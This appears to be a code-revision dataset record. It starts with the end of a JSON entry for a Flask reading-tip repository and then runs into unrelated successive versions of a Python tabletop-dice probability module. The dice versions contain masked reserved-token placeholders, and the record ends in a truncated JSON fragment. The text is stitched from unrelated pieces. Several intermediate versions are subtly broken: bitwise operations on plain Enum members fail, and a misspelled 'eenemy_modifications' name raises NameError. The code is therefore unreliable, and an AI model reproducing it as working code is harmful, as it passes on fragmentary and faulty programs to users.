"step-4": "from models.readingtip import ReadingTip\nfrom database import db\n\n\nclass ReadingTipRepository:\n\n def __init__(self):\n pass\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\nreadingtip_repository = ReadingTipRepository()\n",
"step-5": "from models.readingtip import ReadingTip\nfrom database import db\n\nclass ReadingTipRepository:\n def __init__(self):\n pass\n\n def get_tips(self, user, tag=\"all\"):\n if tag == \"all\":\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({\"read\":date})\n db.session.commit()\n\nreadingtip_repository = ReadingTipRepository()\n",
"step-ids": [
4,
7,
9,
11,
12
]
}
|
[
4,
7,
9,
11,
12
] |
<|reserved_special_token_0|>
class result(Enum):
CRIT = 16
HIT = 8
EVADE = 4
FOCUS = 2
BLANK = 1
<|reserved_special_token_0|>
class die:
def __init__(self):
self.rerolled = False
def __str__(self):
return result_str(self.result)
@staticmethod
def __roll_die__(face_list):
return face_list[randint(0, 8)]
def equals(self, result):
return self.result & result
def change(self, to):
self.result = to
class attack_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = self.__roll_die__(__attack_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
class evade_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = die.__roll_die__(__evade_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
<|reserved_special_token_0|>
class perform(Enum):
FOR_ALL = 7
ONCE = 1
class change:
def __init__(self, rule, from_result, to_result):
self.rule = rule
self.from_result = from_result
self.to_result = to_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
dice_list[i].change(self.to_result)
if self.rule == perform.ONCE:
return dice_list
return dice_list
class reroll:
def __init__(self, rule, from_result):
self.rule = rule
self.from_result = from_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
if dice_list[i].reroll() and self.rule == perform.ONCE:
return dice_list
return dice_list
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class result(Enum):
CRIT = 16
HIT = 8
EVADE = 4
FOCUS = 2
BLANK = 1
<|reserved_special_token_0|>
class die:
def __init__(self):
self.rerolled = False
def __str__(self):
return result_str(self.result)
@staticmethod
def __roll_die__(face_list):
return face_list[randint(0, 8)]
def equals(self, result):
return self.result & result
def change(self, to):
self.result = to
class attack_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = self.__roll_die__(__attack_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
class evade_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = die.__roll_die__(__evade_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
<|reserved_special_token_0|>
def roll_evade_dice(number):
dice_results = []
for i in range(number):
dice_results.append(evade_die())
return dice_results
class perform(Enum):
FOR_ALL = 7
ONCE = 1
class change:
def __init__(self, rule, from_result, to_result):
self.rule = rule
self.from_result = from_result
self.to_result = to_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
dice_list[i].change(self.to_result)
if self.rule == perform.ONCE:
return dice_list
return dice_list
class reroll:
def __init__(self, rule, from_result):
self.rule = rule
self.from_result = from_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
if dice_list[i].reroll() and self.rule == perform.ONCE:
return dice_list
return dice_list
<|reserved_special_token_0|>
def average_chance(chance_list):
avg = 0.0
for i in range(1, len(chance_list)):
avg = avg + i * chance_list[i]
return avg
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class result(Enum):
CRIT = 16
HIT = 8
EVADE = 4
FOCUS = 2
BLANK = 1
def result_str(res):
str = ''
if res & result.BLANK:
str += 'BLANK'
if res & result.FOCUS:
if len(str):
str += '|'
str += 'FOCUS'
if res & result.HIT:
if len(str):
str += '|'
str += 'HIT'
if res & result.CRIT:
if len(str):
str += '|'
str += 'CRIT'
if res & result.EVADE:
if len(str):
str += '|'
str += 'EVADE'
return str
<|reserved_special_token_0|>
class die:
def __init__(self):
self.rerolled = False
def __str__(self):
return result_str(self.result)
@staticmethod
def __roll_die__(face_list):
return face_list[randint(0, 8)]
def equals(self, result):
return self.result & result
def change(self, to):
self.result = to
class attack_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = self.__roll_die__(__attack_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
class evade_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = die.__roll_die__(__evade_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
<|reserved_special_token_0|>
def roll_evade_dice(number):
dice_results = []
for i in range(number):
dice_results.append(evade_die())
return dice_results
class perform(Enum):
FOR_ALL = 7
ONCE = 1
class change:
def __init__(self, rule, from_result, to_result):
self.rule = rule
self.from_result = from_result
self.to_result = to_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
dice_list[i].change(self.to_result)
if self.rule == perform.ONCE:
return dice_list
return dice_list
class reroll:
def __init__(self, rule, from_result):
self.rule = rule
self.from_result = from_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
if dice_list[i].reroll() and self.rule == perform.ONCE:
return dice_list
return dice_list
def __print_dice_list(dice_list):
for i in range(len(dice_list)):
print(dice_list[i], end=' ')
print('')
<|reserved_special_token_0|>
def hits_vs_evade(hit_chances, evade_chances):
chances = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
for i in range(1, len(hit_chances)):
for j in range(i):
chances[i - j] = chances[i - j] + hit_chances[i] * evade_chances[j]
total = 0.0
for i in range(1, len(chances)):
total = total + chances[i]
chances[0] = 1.0 - total
return chances
def average_chance(chance_list):
avg = 0.0
for i in range(1, len(chance_list)):
avg = avg + i * chance_list[i]
return avg
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class result(Enum):
CRIT = 16
HIT = 8
EVADE = 4
FOCUS = 2
BLANK = 1
def result_str(res):
str = ''
if res & result.BLANK:
str += 'BLANK'
if res & result.FOCUS:
if len(str):
str += '|'
str += 'FOCUS'
if res & result.HIT:
if len(str):
str += '|'
str += 'HIT'
if res & result.CRIT:
if len(str):
str += '|'
str += 'CRIT'
if res & result.EVADE:
if len(str):
str += '|'
str += 'EVADE'
return str
<|reserved_special_token_0|>
class die:
def __init__(self):
self.rerolled = False
def __str__(self):
return result_str(self.result)
@staticmethod
def __roll_die__(face_list):
return face_list[randint(0, 8)]
def equals(self, result):
return self.result & result
def change(self, to):
self.result = to
class attack_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = self.__roll_die__(__attack_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
class evade_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = die.__roll_die__(__evade_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
<|reserved_special_token_0|>
def roll_attack_dice(number):
dice_results = []
for i in range(number):
dice_results.append(attack_die())
return dice_results
def roll_evade_dice(number):
dice_results = []
for i in range(number):
dice_results.append(evade_die())
return dice_results
class perform(Enum):
FOR_ALL = 7
ONCE = 1
class change:
def __init__(self, rule, from_result, to_result):
self.rule = rule
self.from_result = from_result
self.to_result = to_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
dice_list[i].change(self.to_result)
if self.rule == perform.ONCE:
return dice_list
return dice_list
class reroll:
def __init__(self, rule, from_result):
self.rule = rule
self.from_result = from_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
if dice_list[i].reroll() and self.rule == perform.ONCE:
return dice_list
return dice_list
def __print_dice_list(dice_list):
for i in range(len(dice_list)):
print(dice_list[i], end=' ')
print('')
<|reserved_special_token_0|>
def get_hit_chances(number_of_dice, enemy_modifications=[],
friendly_modifications=[]):
return get_dice_chances(number_of_dice, roll_attack_dice, result.HIT |
result.CRIT, enemy_modifications, friendly_modifications)
def get_evade_chances(number_of_dice, enemy_modifications=[],
friendly_modifications=[]):
return get_dice_chances(number_of_dice, roll_evade_dice, result.EVADE,
enemy_modifications, friendly_modifications)
def get_crit_chances(number_of_dice, enemy_modifications=[],
friendly_modifications=[]):
return get_dice_chances(number_of_dice, roll_attack_dice, result.CRIT,
eenemy_modifications, friendly_modifications)
def hits_vs_evade(hit_chances, evade_chances):
chances = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
for i in range(1, len(hit_chances)):
for j in range(i):
chances[i - j] = chances[i - j] + hit_chances[i] * evade_chances[j]
total = 0.0
for i in range(1, len(chances)):
total = total + chances[i]
chances[0] = 1.0 - total
return chances
def average_chance(chance_list):
avg = 0.0
for i in range(1, len(chance_list)):
avg = avg + i * chance_list[i]
return avg
<|reserved_special_token_1|>
# Imports
from __future__ import print_function

from enum import Enum, IntEnum

import numpy
from numpy.random import randint

__all__ = ["common", "plot"]
class result(IntEnum):
    """Die-face result flags (power-of-two values so they combine bitwise).

    IntEnum (rather than plain Enum) is required: this module combines and
    tests members with | and & (e.g. result.HIT | result.CRIT in
    get_hit_chances, res & result.BLANK in result_str), which plain Enum
    members do not support and which raised TypeError at runtime.
    """
    CRIT = 16
    HIT = 8
    EVADE = 4
    FOCUS = 2
    BLANK = 1
def result_str(res):
    """Render a (possibly combined) result value as a '|'-separated string."""
    flag_names = (
        (result.BLANK, "BLANK"),
        (result.FOCUS, "FOCUS"),
        (result.HIT, "HIT"),
        (result.CRIT, "CRIT"),
        (result.EVADE, "EVADE"),
    )
    # Keep the same BLANK..EVADE ordering the original string builder used.
    return "|".join(name for flag, name in flag_names if res & flag)
# DICE CLASSES DEFINITIONS
# Eight faces per die. Attack die: 1 crit, 3 hits, 2 focus, 2 blanks.
__attack_die_faces__ = [result.CRIT, result.HIT, result.HIT, result.HIT, result.FOCUS, result.FOCUS, result.BLANK, result.BLANK]
# Evade die: 3 evades, 2 focus, 3 blanks.
__evade_die_faces__ = [result.EVADE, result.EVADE, result.EVADE, result.FOCUS, result.FOCUS, result.BLANK, result.BLANK, result.BLANK]
class die:
    """One eight-sided game die; subclasses supply the face list rolled from."""

    def __init__(self):
        # A die may be rerolled at most once per roll (see subclass reroll()).
        self.rerolled = False

    def __str__(self):
        return result_str(self.result)

    @staticmethod
    def __roll_die__(face_list):
        # numpy's randint excludes the upper bound, so this picks faces 0-7.
        return face_list[randint(0, 8)]

    def change(self, to):
        # Force the die to show a specific result.
        self.result = to

    def equals(self, result):
        # Bitwise test: truthy when the die shows any of the given flags.
        # (The parameter name shadows the module-level `result` enum; kept
        # unchanged for backward compatibility with keyword callers.)
        return self.result & result
class attack_die(die):
    """Attack die: 1 crit, 3 hit, 2 focus and 2 blank faces."""

    def __init__(self):
        die.__init__(self)
        self.__roll__()

    def __roll__(self):
        self.result = self.__roll_die__(__attack_die_faces__)

    def reroll(self):
        # Guard clause: a die can only ever be rerolled once.
        if self.rerolled:
            return False
        self.rerolled = True
        self.__roll__()
        return True
class evade_die(die):
    """Evade die: 3 evade, 2 focus and 3 blank faces."""

    def __init__(self):
        die.__init__(self)
        self.__roll__()

    def __roll__(self):
        self.result = die.__roll_die__(__evade_die_faces__)

    def reroll(self):
        # Guard clause: a die can only ever be rerolled once.
        if self.rerolled:
            return False
        self.rerolled = True
        self.__roll__()
        return True
# DICE LIST METHOD DEFINITIONS
def count_relevant_results(dice_list, relevant_results):
    """Count dice whose result shares at least one flag with relevant_results."""
    return sum(1 for d in dice_list if d.result & relevant_results)
def roll_attack_dice(number):
    """Roll *number* fresh attack dice and return them as a list."""
    return [attack_die() for _ in range(number)]
def roll_evade_dice(number):
    """Roll *number* fresh evade dice and return them as a list."""
    return [evade_die() for _ in range(number)]
# DICE LIST MODIFICATION DEFINITIONS
class perform(Enum):
    """Application rule for a dice-list modification.

    Only compared with == in this module; the numeric values are not used
    bitwise anywhere visible here.
    """
    FOR_ALL = 7  # keep applying the modification to every matching die
    ONCE = 1     # stop after the first die the modification affects
class change:
    """Dice modification that turns one result into another in place.

    With rule == perform.ONCE only the first matching die is changed;
    otherwise every matching die is.
    """

    def __init__(self, rule, from_result, to_result):
        self.rule = rule
        self.from_result = from_result
        self.to_result = to_result

    def modify_dice_list(self, dice_list):
        for d in dice_list:
            if not d.equals(self.from_result):
                continue
            d.change(self.to_result)
            if self.rule == perform.ONCE:
                break
        return dice_list
class reroll:
    """Dice modification that rerolls dice currently showing from_result."""

    def __init__(self, rule, from_result):
        self.rule = rule
        self.from_result = from_result

    def modify_dice_list(self, dice_list):
        for d in dice_list:
            # die.reroll() returns False for dice already rerolled once, so
            # such dice never count as "the one" reroll under perform.ONCE.
            if d.equals(self.from_result) and d.reroll() and self.rule == perform.ONCE:
                break
        return dice_list
# Debug
def __print_dice_list(dice_list):
    # Debug helper: every die followed by a space, then a trailing newline
    # (matches the original per-die print(..., end=" ") output exactly).
    print("".join(str(d) + " " for d in dice_list))
def get_dice_chances(number_of_dice, dice_roll_function, relevant_results, enemy_modifications, friendly_modifications):
    """Monte-Carlo estimate of the probability of each possible count (0-7)
    of relevant results when rolling number_of_dice dice.

    Returns a length-8 numpy array where index i is the chance of exactly
    i relevant results after all modifications are applied.
    """
    NUM_ITERATIONS = 200000
    relevant_counts = numpy.zeros(8)
    for _ in range(NUM_ITERATIONS):
        dice = dice_roll_function(number_of_dice)
        # Enemy modifications are applied before friendly ones.
        for modification in enemy_modifications:
            dice = modification.modify_dice_list(dice)
        for modification in friendly_modifications:
            dice = modification.modify_dice_list(dice)
        relevant_counts[count_relevant_results(dice, relevant_results)] += 1
    # Convert raw tallies into relative frequencies.
    return relevant_counts / float(NUM_ITERATIONS)
def get_hit_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):
    """Chance distribution of HIT-or-CRIT counts for an attack roll."""
    relevant = result.HIT | result.CRIT
    return get_dice_chances(number_of_dice, roll_attack_dice, relevant,
                            enemy_modifications, friendly_modifications)
def get_evade_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):
    """Chance distribution of EVADE counts for a defence roll."""
    return get_dice_chances(number_of_dice, roll_evade_dice, result.EVADE,
                            enemy_modifications, friendly_modifications)
def get_crit_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):
    """Chance distribution of CRIT counts for an attack roll.

    Fix: the forwarded argument was misspelled 'eenemy_modifications', which
    raised NameError on every call.
    """
    return get_dice_chances(number_of_dice, roll_attack_dice, result.CRIT,
                            enemy_modifications, friendly_modifications)
def hits_vs_evade(hit_chances, evade_chances):
    """Combine an attacker's hit distribution with a defender's evade
    distribution into the distribution of unblocked hits (indices 0-7)."""
    chances = [0.0] * 8
    for hits in range(1, len(hit_chances)):
        # Every evade count strictly below the hit count leaves hits - evades
        # unblocked hits.
        for evades in range(hits):
            chances[hits - evades] += hit_chances[hits] * evade_chances[evades]
    # The remaining probability mass corresponds to zero unblocked hits.
    chances[0] = 1.0 - sum(chances[1:])
    return chances
def average_chance(chance_list):
	"""Expected value of a count distribution: sum over i of i * P(i)."""
	total = 0.0
	for count, probability in enumerate(chance_list[1:], start=1):
		total += count * probability
	return total
|
flexible
|
{
"blob_id": "5261346f96e7520b6ef75a292b3d44a6f00d868c",
"index": 5566,
"step-1": "<mask token>\n\n\nclass result(Enum):\n CRIT = 16\n HIT = 8\n EVADE = 4\n FOCUS = 2\n BLANK = 1\n\n\n<mask token>\n\n\nclass die:\n\n def __init__(self):\n self.rerolled = False\n\n def __str__(self):\n return result_str(self.result)\n\n @staticmethod\n def __roll_die__(face_list):\n return face_list[randint(0, 8)]\n\n def equals(self, result):\n return self.result & result\n\n def change(self, to):\n self.result = to\n\n\nclass attack_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = self.__roll_die__(__attack_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\nclass evade_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = die.__roll_die__(__evade_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\n<mask token>\n\n\nclass perform(Enum):\n FOR_ALL = 7\n ONCE = 1\n\n\nclass change:\n\n def __init__(self, rule, from_result, to_result):\n self.rule = rule\n self.from_result = from_result\n self.to_result = to_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n dice_list[i].change(self.to_result)\n if self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\nclass reroll:\n\n def __init__(self, rule, from_result):\n self.rule = rule\n self.from_result = from_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n if dice_list[i].reroll() and self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass result(Enum):\n CRIT = 16\n HIT = 8\n EVADE = 4\n FOCUS = 2\n BLANK = 1\n\n\n<mask token>\n\n\nclass die:\n\n def __init__(self):\n self.rerolled = False\n\n def __str__(self):\n return result_str(self.result)\n\n @staticmethod\n def __roll_die__(face_list):\n return face_list[randint(0, 8)]\n\n def equals(self, result):\n return self.result & result\n\n def change(self, to):\n self.result = to\n\n\nclass attack_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = self.__roll_die__(__attack_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\nclass evade_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = die.__roll_die__(__evade_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\n<mask token>\n\n\ndef roll_evade_dice(number):\n dice_results = []\n for i in range(number):\n dice_results.append(evade_die())\n return dice_results\n\n\nclass perform(Enum):\n FOR_ALL = 7\n ONCE = 1\n\n\nclass change:\n\n def __init__(self, rule, from_result, to_result):\n self.rule = rule\n self.from_result = from_result\n self.to_result = to_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n dice_list[i].change(self.to_result)\n if self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\nclass reroll:\n\n def __init__(self, rule, from_result):\n self.rule = rule\n self.from_result = from_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n if dice_list[i].reroll() and self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\n<mask token>\n\n\ndef average_chance(chance_list):\n avg = 0.0\n for i 
in range(1, len(chance_list)):\n avg = avg + i * chance_list[i]\n return avg\n",
"step-3": "<mask token>\n\n\nclass result(Enum):\n CRIT = 16\n HIT = 8\n EVADE = 4\n FOCUS = 2\n BLANK = 1\n\n\ndef result_str(res):\n str = ''\n if res & result.BLANK:\n str += 'BLANK'\n if res & result.FOCUS:\n if len(str):\n str += '|'\n str += 'FOCUS'\n if res & result.HIT:\n if len(str):\n str += '|'\n str += 'HIT'\n if res & result.CRIT:\n if len(str):\n str += '|'\n str += 'CRIT'\n if res & result.EVADE:\n if len(str):\n str += '|'\n str += 'EVADE'\n return str\n\n\n<mask token>\n\n\nclass die:\n\n def __init__(self):\n self.rerolled = False\n\n def __str__(self):\n return result_str(self.result)\n\n @staticmethod\n def __roll_die__(face_list):\n return face_list[randint(0, 8)]\n\n def equals(self, result):\n return self.result & result\n\n def change(self, to):\n self.result = to\n\n\nclass attack_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = self.__roll_die__(__attack_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\nclass evade_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = die.__roll_die__(__evade_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\n<mask token>\n\n\ndef roll_evade_dice(number):\n dice_results = []\n for i in range(number):\n dice_results.append(evade_die())\n return dice_results\n\n\nclass perform(Enum):\n FOR_ALL = 7\n ONCE = 1\n\n\nclass change:\n\n def __init__(self, rule, from_result, to_result):\n self.rule = rule\n self.from_result = from_result\n self.to_result = to_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n dice_list[i].change(self.to_result)\n if self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\nclass reroll:\n\n def 
__init__(self, rule, from_result):\n self.rule = rule\n self.from_result = from_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n if dice_list[i].reroll() and self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\ndef __print_dice_list(dice_list):\n for i in range(len(dice_list)):\n print(dice_list[i], end=' ')\n print('')\n\n\n<mask token>\n\n\ndef hits_vs_evade(hit_chances, evade_chances):\n chances = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n for i in range(1, len(hit_chances)):\n for j in range(i):\n chances[i - j] = chances[i - j] + hit_chances[i] * evade_chances[j]\n total = 0.0\n for i in range(1, len(chances)):\n total = total + chances[i]\n chances[0] = 1.0 - total\n return chances\n\n\ndef average_chance(chance_list):\n avg = 0.0\n for i in range(1, len(chance_list)):\n avg = avg + i * chance_list[i]\n return avg\n",
"step-4": "<mask token>\n\n\nclass result(Enum):\n CRIT = 16\n HIT = 8\n EVADE = 4\n FOCUS = 2\n BLANK = 1\n\n\ndef result_str(res):\n str = ''\n if res & result.BLANK:\n str += 'BLANK'\n if res & result.FOCUS:\n if len(str):\n str += '|'\n str += 'FOCUS'\n if res & result.HIT:\n if len(str):\n str += '|'\n str += 'HIT'\n if res & result.CRIT:\n if len(str):\n str += '|'\n str += 'CRIT'\n if res & result.EVADE:\n if len(str):\n str += '|'\n str += 'EVADE'\n return str\n\n\n<mask token>\n\n\nclass die:\n\n def __init__(self):\n self.rerolled = False\n\n def __str__(self):\n return result_str(self.result)\n\n @staticmethod\n def __roll_die__(face_list):\n return face_list[randint(0, 8)]\n\n def equals(self, result):\n return self.result & result\n\n def change(self, to):\n self.result = to\n\n\nclass attack_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = self.__roll_die__(__attack_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\nclass evade_die(die):\n\n def __init__(self):\n die.__init__(self)\n self.__roll__()\n\n def __roll__(self):\n self.result = die.__roll_die__(__evade_die_faces__)\n\n def reroll(self):\n if not self.rerolled:\n self.__roll__()\n self.rerolled = True\n return True\n return False\n\n\n<mask token>\n\n\ndef roll_attack_dice(number):\n dice_results = []\n for i in range(number):\n dice_results.append(attack_die())\n return dice_results\n\n\ndef roll_evade_dice(number):\n dice_results = []\n for i in range(number):\n dice_results.append(evade_die())\n return dice_results\n\n\nclass perform(Enum):\n FOR_ALL = 7\n ONCE = 1\n\n\nclass change:\n\n def __init__(self, rule, from_result, to_result):\n self.rule = rule\n self.from_result = from_result\n self.to_result = to_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n 
dice_list[i].change(self.to_result)\n if self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\nclass reroll:\n\n def __init__(self, rule, from_result):\n self.rule = rule\n self.from_result = from_result\n\n def modify_dice_list(self, dice_list):\n for i in range(len(dice_list)):\n if dice_list[i].equals(self.from_result):\n if dice_list[i].reroll() and self.rule == perform.ONCE:\n return dice_list\n return dice_list\n\n\ndef __print_dice_list(dice_list):\n for i in range(len(dice_list)):\n print(dice_list[i], end=' ')\n print('')\n\n\n<mask token>\n\n\ndef get_hit_chances(number_of_dice, enemy_modifications=[],\n friendly_modifications=[]):\n return get_dice_chances(number_of_dice, roll_attack_dice, result.HIT |\n result.CRIT, enemy_modifications, friendly_modifications)\n\n\ndef get_evade_chances(number_of_dice, enemy_modifications=[],\n friendly_modifications=[]):\n return get_dice_chances(number_of_dice, roll_evade_dice, result.EVADE,\n enemy_modifications, friendly_modifications)\n\n\ndef get_crit_chances(number_of_dice, enemy_modifications=[],\n friendly_modifications=[]):\n return get_dice_chances(number_of_dice, roll_attack_dice, result.CRIT,\n eenemy_modifications, friendly_modifications)\n\n\ndef hits_vs_evade(hit_chances, evade_chances):\n chances = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n for i in range(1, len(hit_chances)):\n for j in range(i):\n chances[i - j] = chances[i - j] + hit_chances[i] * evade_chances[j]\n total = 0.0\n for i in range(1, len(chances)):\n total = total + chances[i]\n chances[0] = 1.0 - total\n return chances\n\n\ndef average_chance(chance_list):\n avg = 0.0\n for i in range(1, len(chance_list)):\n avg = avg + i * chance_list[i]\n return avg\n",
"step-5": "# Imports\r\nfrom __future__ import print_function\r\n\r\nimport numpy\r\nfrom numpy.random import randint\r\nfrom enum import Enum\r\n\r\n__all__ = [\"common\", \"plot\"]\r\n\r\nclass result(Enum):\r\n\tCRIT = 16\r\n\tHIT = 8\r\n\tEVADE = 4\r\n\tFOCUS = 2\r\n\tBLANK = 1\r\n\t\r\ndef result_str(res):\r\n\tstr = \"\"\r\n\tif res & result.BLANK:\r\n\t\tstr += \"BLANK\"\r\n\tif res & result.FOCUS:\r\n\t\tif len(str):\r\n\t\t\tstr += \"|\"\r\n\t\tstr += \"FOCUS\"\r\n\tif res & result.HIT:\r\n\t\tif len(str):\r\n\t\t\tstr += \"|\"\r\n\t\tstr += \"HIT\"\r\n\tif res & result.CRIT:\r\n\t\tif len(str):\r\n\t\t\tstr += \"|\"\r\n\t\tstr += \"CRIT\"\r\n\tif res & result.EVADE:\r\n\t\tif len(str):\r\n\t\t\tstr += \"|\"\r\n\t\tstr += \"EVADE\"\r\n\treturn str\r\n\r\n# DICE CLASSES DEFINITIONS\r\n\r\n__attack_die_faces__ = [result.CRIT, result.HIT, result.HIT, result.HIT, result.FOCUS, result.FOCUS, result.BLANK, result.BLANK]\r\n__evade_die_faces__ = [result.EVADE, result.EVADE, result.EVADE, result.FOCUS, result.FOCUS, result.BLANK, result.BLANK, result.BLANK]\r\n\t\r\n\r\nclass die:\r\n\tdef __init__ (self):\r\n\t\tself.rerolled = False\r\n\tdef __str__(self):\r\n\t\treturn result_str(self.result)\r\n\t@staticmethod\r\n\tdef __roll_die__(face_list):\r\n\t\treturn face_list[randint(0, 8)]\r\n\tdef equals(self, result):\r\n\t\treturn self.result & result\r\n\tdef change(self, to):\r\n\t\tself.result = to\r\n\r\nclass attack_die(die):\r\n\tdef __init__(self):\r\n\t\tdie.__init__(self)\r\n\t\tself.__roll__()\r\n\tdef __roll__(self):\r\n\t\tself.result = self.__roll_die__(__attack_die_faces__)\r\n\tdef reroll(self):\r\n\t\tif not self.rerolled:\r\n\t\t\tself.__roll__()\r\n\t\t\tself.rerolled = True\r\n\t\t\treturn True\r\n\t\treturn False\r\n\r\nclass evade_die(die):\r\n\tdef __init__(self):\r\n\t\tdie.__init__(self)\r\n\t\tself.__roll__()\r\n\tdef __roll__(self):\r\n\t\tself.result = die.__roll_die__(__evade_die_faces__)\r\n\tdef reroll(self):\r\n\t\tif not 
